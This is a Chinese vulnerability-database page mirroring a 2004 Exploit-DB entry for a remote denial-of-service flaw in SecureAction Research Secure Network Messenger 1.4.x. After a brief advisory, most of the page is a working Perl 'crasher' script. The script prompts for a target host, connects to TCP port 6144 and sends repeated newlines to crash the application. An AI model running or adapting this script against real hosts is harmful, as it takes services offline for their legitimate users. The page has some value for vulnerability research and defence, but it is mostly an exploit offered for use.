SecureAction Research Secure Network Messenger 1.4.x – Remote Denial of Service

SecureAction Research Secure Network Messenger 1.4.x – Remote Denial of Service

漏洞ID 1054750 漏洞类型
发布时间 2004-11-12 更新时间 2004-11-12
图片[1]-SecureAction Research Secure Network Messenger 1.4.x – Remote Denial of Service-安全小百科CVE编号 N/A
图片[2]-SecureAction Research Secure Network Messenger 1.4.x – Remote Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24733
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/11670/info

A remote denial of service vulnerability affects SecureAction Research Secure Network Messenger. This issue is due to a failure of the application to properly handle exceptional network data.

An attacker may leverage this issue to cause a computer running the vulnerable application to crash, denying service to legitimate users.

#!/usr/bin/perl

use IO::Socket;
print ("nSecure Network Messenger Crasher by ClearScreenn");
print ("nEnter host to crash: ");
$h = <STDIN>;
chomp $h;
$socks = IO::Socket::INET->new(
       Proto => "tcp",
       PeerPort => "6144",
       PeerAddr => "$h"
) or die "nNo response from host.";

sleep 1;
print "nSuccesfully connected to $h!n";
for ($count=1; $count<15; $count++)
{
print $socks "n";
select(undef, undef, undef, 0.1);
}
print "nMessenger crashed.";
close $socks;

相关推荐: SCO Unixware i2odialogd Remote Buffer Overflow Vulnerability

SCO Unixware i2odialogd Remote Buffer Overflow Vulnerability 漏洞ID 1104433 漏洞类型 Boundary Condition Error 发布时间 1999-12-22 更新时间 1999-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享